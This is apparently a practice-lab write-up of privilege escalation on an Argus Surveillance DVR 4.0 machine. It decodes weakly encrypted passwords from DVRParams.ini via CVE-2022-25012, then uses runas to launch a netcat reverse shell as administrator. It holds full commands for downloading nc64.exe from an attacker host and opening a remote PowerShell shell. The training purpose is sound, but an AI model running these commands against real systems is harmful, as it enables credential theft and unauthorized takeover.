CVE-2022-25012
It has been established that the target Argus Surveillance DVR instance is running with privileges of either administrator or SYSTEM. Additionally, it suffers from CVE-2022-25012
/Practice/DVR4/5-Privilege_Escalation/attachments/{E9E6C02D-CE9F-44A0-B083-B9C60BDB8215}.png)
A vulnerability classified as problematic has been found in Argus Surveillance DVR 4.0. This affects some unknown functionality. The manipulation with an unknown input leads to a inadequate encryption vulnerability. CWE is classifying the issue as CWE-326. The product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. This is going to have an impact on confidentiality.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ searchsploit -m windows/local/50130.py ; mv 50130.py CVE-2022-25012.py
Exploit: Argus Surveillance DVR 4.0 - Weak Password Encryption
URL: https://www.exploit-db.com/exploits/50130
Path: /usr/share/exploitdb/exploits/windows/local/50130.py
Codes: N/A
Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/dvr4/50130.pyExploit locally available
Exploitation
/Practice/DVR4/5-Privilege_Escalation/attachments/{97A88937-087B-4CF0-9F72-10652B74F323}.png)
The C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini file contains the password hash
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String passwor*
DialUpPassword=
RecordEncryptionPassword=
TaskTrayPassword=
MotionEmailNeedPassword=0
MotionEmailPassword=
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFEThose 2 are the password hashes belong to both Administrator and Viewer users
Password1
/Practice/DVR4/5-Privilege_Escalation/attachments/{7E9F58BC-B7B6-40D8-A9C5-473E48D53CE6}.png)
Modifying the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ python3 CVE-2022-25012.py
#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############
[+] 5E53:I
[+] 4D7B:m
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] C875:i
[+] EB60:n
[+] 3CD9:g
[+] D8E1:Y
[+] BD8F:0
[+] AAFE:uPassword is ImWatchingY0u
Validation ImWatchingY0u
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ sshpass -p ImWatchingY0u ssh viewer@$IP
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Users\viewer> whoami
dvr4\viewer
C:\Users\viewer> hostname
DVR4
C:\Users\viewer> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.150.179
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.150.254Validated
The password belongs to the viewer user
Password0
/Practice/DVR4/5-Privilege_Escalation/attachments/{1E88DAC0-A222-48AB-B454-B97EDBA2935C}.png)
Modifying the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ python3 CVE-2022-25012.py
#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############
[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:UnknownExecuting the exploit script reveals the password; 14WatchD0g
However, the last character is unidentified; D9A8:Unknown
D9A8:Unknown
/Practice/DVR4/5-Privilege_Escalation/attachments/{390946EC-94BD-4EE6-B3EC-72BA6E1E0A67}.png)
The exploit author did not work on special characters
This would mean that D9A8 is likely a special character
/Practice/DVR4/5-Privilege_Escalation/attachments/{C6D039BD-16D2-444C-9828-B32D5DBE51CA}.png)
/Practice/DVR4/5-Privilege_Escalation/attachments/{1F7B3131-D9AC-46AB-9652-E05D465E28CB}.png)
I will create a user with a password containing special characters; !@#$%^&*
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
Password2=B39878A7Interestingly, it only registered 2 characters. That seems to be the limit
/Practice/DVR4/5-Privilege_Escalation/attachments/{2E660072-ABC0-49C0-A2C2-2C9938C1060B}.png)
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
Password2=78A7Resetting password to @
78A7 is @
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
Password2=Resetting password to # fails as it doesn’t recognize the # character
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
Password2=D9A8Resetting password to $ reveals the hashstring, D9A8, which matches
So the password is 14WatchD0g$
Validation 14WatchD0g$
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ sshpass -p '14WatchD0g$' ssh administrator@$IP
Permission denied, please try again.Failed to authenticate to the SSH server
runas
C:\Users\viewer> C:\Windows\System32\runas.exe /user:DVR4\administrator "powershell -c whoami > C:\out.txt"
Enter the password for DVR4\administrator: 14WatchD0g$
Attempting to start powershell -c whoami > C:\out.txt as user "DVR4\administrator" ...
C:\Users\viewer> type C:\out.txt
dvr4\administratorValidated
It seems that the administrator user is not authorized to use SSH
C:\Users\viewer> powershell -ep bypass -nop -c iwr -Uri http://192.168.45.209/nc64.exe -OutFile .\nc64.exe
C:\Users\viewer> C:\Windows\System32\runas.exe /user:DVR4\administrator "C:\Users\viewer\nc64.exe 192.168.45.209 1234 -e powershell"
Enter the password for DVR4\administrator: 14WatchD0g$
Attempting to start C:\Users\viewer\nc64.exe 192.168.45.209 1234 -e powershell as user "DVR4\administrator" ...Executing Netcat with runas.exe
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.150.179] 51873
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\WINDOWS\system32> whoami
whoami
dvr4\administrator
PS C:\WINDOWS\system32> hostname
hostname
DVR4
PS C:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.150.179
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.150.254System level compromise